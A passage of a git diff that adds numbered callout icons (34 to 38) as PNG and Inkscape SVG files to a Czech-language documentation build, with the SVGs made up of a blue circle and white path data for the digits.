-0.160484,0.09409 -0.307131,0.188161 -0.439942,0.282227 l -1.294922,-1.709961 c 0.232421,-0.171538 0.484212,-0.329253 0.755371,-0.473145 0.276692,-0.143868 0.575519,-0.26838 0.896485,-0.373535 0.320961,-0.1106647 0.666826,-0.1964393 1.037597,-0.2573239 0.370765,-0.06086 0.766435,-0.091296 1.187012,-0.091309 0.597651,1.23e-5 1.139969,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/34.png b/tmp/cs-CZ/html/Common_Content/images/34.png
new file mode 100644
index 000000000..ba4435253
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/34.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/34.svg b/tmp/cs-CZ/html/Common_Content/images/34.svg
new file mode 100644
index 000000000..7bbdf5b9a
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/34.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.803816,19.493301 -1.460938,0 0,2.515137 -2.498535,0 0,-2.515137 -5.013672,0 0,-1.784668 5.154785,-7.8359371 2.357422,0 0,7.6284181 1.460938,0 0,1.992187 m -3.959473,-1.992187 0,-2.058594 c -5e-6,-0.07193 -5e-6,-0.17431 0,-0.307129 0.0055,-0.138339 0.01106,-0.293287 0.0166,-0.464844 0.0055,-0.171541 0.01106,-0.348625 0.0166,-0.53125 0.01106,-0.182609 0.01936,-0.356925 0.0249,-0.522949 0.01106,-0.166007 0.01936,-0.309887 0.0249,-0.43164 0.01106,-0.12727 0.01936,-0.218579 0.0249,-0.273926 l -0.07471,0 c -0.09961,0.232431 -0.213058,0.478687 -0.340332,0.738769 -0.121749,0.2601 -0.262862,0.520191 -0.42334,0.780274 l -2.02539,3.071289 2.755859,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/35.png b/tmp/cs-CZ/html/Common_Content/images/35.png
new file mode 100644
index 000000000..21d4575cf
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/35.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/35.svg b/tmp/cs-CZ/html/Common_Content/images/35.svg
new file mode 100644
index 000000000..8e19553af
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/35.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 20.761335,14.255508 c 0.520177,8e-6 1.004389,0.08025 1.452637,0.240723 0.448235,0.160489 0.838372,0.395678 1.17041,0.705566 0.332024,0.309903 0.592114,0.697272 0.780274,1.16211 0.188142,0.459315 0.282218,0.987797 0.282226,1.585449 -8e-6,0.658532 -0.102385,1.250654 -0.307129,1.776367 -0.20476,0.520184 -0.506355,0.962892 -0.904785,1.328125 -0.398444,0.359701 -0.893724,0.636394 -1.48584,0.830078 -0.586594,0.193685 -1.261723,0.290528 -2.02539,0.290528 -0.304366,0 -0.605961,-0.01384 -0.904785,-0.0415 -0.298831,-0.02767 -0.586591,-0.06917 -0.863282,-0.124512 -0.27116,-0.04981 -0.531251,-0.116211 -0.780273,-0.199219 -0.243491,-0.08301 -0.464845,-0.17985 -0.664063,-0.290527 l 0,-2.216309 c 0.193684,0.11068 0.417805,0.215823 0.672364,0.31543 0.254555,0.09408 0.517413,0.177086 0.788574,0.249024 0.27669,0.06641 0.553383,0.121746 0.830078,0.166015 0.276689,0.03874 0.539547,0.05811 0.788574,0.05811 0.741532,2e-6 1.305985,-0.152179 1.69336,-0.456543 0.387364,-0.309893 0.581048,-0.799639 0.581054,-1.469239 -6e-6,-0.597651 -0.190924,-1.051427 -0.572754,-1.361328 -0.376307,-0.315424 -0.960128,-0.473139 -1.751464,-0.473144 -0.143884,5e-6 -0.298832,0.0083 -0.464844,0.0249 -0.160485,0.01661 -0.320967,0.03874 -0.481446,0.06641 -0.15495,0.02768 -0.304364,0.05811 -0.448242,0.09131 -0.143882,0.02767 -0.268394,0.05811 -0.373535,0.09131 l -1.020996,-0.547852 0.456543,-6.1840821 6.408203,0 0,2.1748051 -4.183594,0 -0.199218,2.382324 c 0.177079,-0.03873 0.381832,-0.07747 0.614257,-0.116211 0.237952,-0.03873 0.542314,-0.0581 0.913086,-0.05811"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/36.png b/tmp/cs-CZ/html/Common_Content/images/36.png
new file mode 100644
index 000000000..b5402b577
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/36.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/36.svg b/tmp/cs-CZ/html/Common_Content/images/36.svg
new file mode 100644
index 000000000..d364dbf51
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/36.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 16.428328,16.853653 c -1e-6,-0.581049 0.03044,-1.159336 0.09131,-1.734863 0.06641,-0.575514 0.17985,-1.126132 0.340332,-1.651856 0.166015,-0.531241 0.387369,-1.023753 0.664063,-1.477539 0.282224,-0.453765 0.636391,-0.846669 1.0625,-1.178711 0.431637,-0.337553 0.946285,-0.600411 1.543945,-0.788574 0.603185,-0.1936727 1.305984,-0.2905151 2.108398,-0.2905274 0.116205,1.23e-5 0.243483,0.00278 0.381836,0.0083 0.13834,0.00555 0.276686,0.013847 0.415039,0.024902 0.143873,0.00555 0.282219,0.016614 0.415039,0.033203 0.132805,0.016614 0.251783,0.035982 0.356934,0.058105 l 0,2.0502924 c -0.210294,-0.04979 -0.434415,-0.08853 -0.672363,-0.116211 -0.232429,-0.03319 -0.467618,-0.04979 -0.705567,-0.0498 -0.747076,1e-5 -1.361333,0.09408 -1.842773,0.282226 -0.48145,0.182627 -0.863285,0.439951 -1.145508,0.771973 -0.28223,0.33204 -0.484215,0.730477 -0.605957,1.195312 -0.116214,0.464852 -0.188154,0.9795 -0.21582,1.543946 l 0.09961,0 c 0.110674,-0.199212 0.243487,-0.384596 0.398438,-0.556153 0.160478,-0.177076 0.345862,-0.32649 0.556152,-0.448242 0.210282,-0.127271 0.445471,-0.22688 0.705566,-0.298828 0.265621,-0.07193 0.561681,-0.107902 0.888184,-0.10791 0.52571,8e-6 0.998854,0.08578 1.419434,0.257324 0.420565,0.171557 0.774732,0.42058 1.0625,0.74707 0.293286,0.326504 0.517407,0.727708 0.672363,1.203614 0.154939,0.475916 0.232413,1.021 0.232422,1.635254 -9e-6,0.658532 -0.09408,1.247887 -0.282227,1.768066 -0.182625,0.520184 -0.445483,0.962892 -0.788574,1.328125 -0.343106,0.359701 -0.758145,0.636394 -1.245117,0.830078 -0.486985,0.188151 -1.034836,0.282227 -1.643555,0.282227 -0.59766,0 -1.156579,-0.105144 -1.676758,-0.31543 -0.520185,-0.21582 -0.97396,-0.542317 -1.361328,-0.979492 -0.381837,-0.437173 -0.683432,-0.987791 -0.904785,-1.651856 -0.215821,-0.669593 -0.323731,-1.460933 -0.32373,-2.374023 m 4.216796,3.270508 c 0.226883,2e-6 0.431636,-0.0415 0.614258,-0.124512 0.188146,-0.08854 0.348627,-0.218585 0.481446,-0.390137 0.13834,-0.17708 0.243483,-0.398434 0.315429,-0.664062 0.07747,-0.265622 0.116205,-0.581051 0.116211,-0.946289 -6e-6,-0.592118 -0.124518,-1.056961 -0.373535,-1.394531 -0.243495,-0.343094 -0.61703,-0.514643 -1.120605,-0.514649 -0.254562,6e-6 -0.486984,0.04981 -0.697266,0.149414 -0.21029,0.09962 -0.390141,0.229661 -0.539551,0.390137 -0.149417,0.160487 -0.265628,0.340337 -0.348633,0.539551 -0.07748,0.199223 -0.116214,0.401209 -0.116211,0.605957 -3e-6,0.28223 0.0332,0.564456 0.09961,0.846679 0.07194,0.276696 0.17708,0.528486 0.315429,0.755371 0.143877,0.221357 0.318193,0.401207 0.52295,0.539551 0.210282,0.138349 0.453771,0.207522 0.730468,0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/37.png b/tmp/cs-CZ/html/Common_Content/images/37.png
new file mode 100644
index 000000000..9fd99d220
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/37.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/37.svg b/tmp/cs-CZ/html/Common_Content/images/37.svg
new file mode 100644
index 000000000..771fa4d11
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/37.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 17.51573,22.008438 4.316406,-9.960937 -5.578125,0 0,-2.1582035 8.367188,0 0,1.6103515 -4.424317,10.508789 -2.681152,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/38.png b/tmp/cs-CZ/html/Common_Content/images/38.png
new file mode 100644
index 000000000..3ce6027f0
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/38.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/38.svg b/tmp/cs-CZ/html/Common_Content/images/38.svg
new file mode 100644
index 000000000..487e0ef30
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/38.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 20.48741,9.7149811 c 0.503575,1.23e-5 0.979486,0.060885 1.427734,0.1826172 0.448236,0.1217567 0.841139,0.3043737 1.178711,0.5478517 0.337557,0.243501 0.605949,0.547862 0.805176,0.913086 0.19921,0.365244 0.298819,0.794118 0.298828,1.286621 -9e-6,0.365243 -0.05535,0.697274 -0.166016,0.996094 -0.110685,0.293302 -0.262866,0.561694 -0.456543,0.805175 -0.193692,0.237963 -0.423347,0.451017 -0.688965,0.639161 -0.265631,0.188157 -0.553392,0.359707 -0.863281,0.514648 0.320957,0.171556 0.63362,0.362473 0.937988,0.572754 0.309889,0.210292 0.583814,0.448247 0.821778,0.713867 0.237947,0.260096 0.428865,0.55339 0.572754,0.879883 0.143871,0.326501 0.215811,0.691735 0.21582,1.095703 -9e-6,0.503583 -0.09962,0.960126 -0.298828,1.369629 -0.199227,0.409506 -0.478687,0.758139 -0.838379,1.045898 -0.359708,0.287761 -0.791348,0.509115 -1.294922,0.664063 -0.498053,0.154948 -1.048671,0.232422 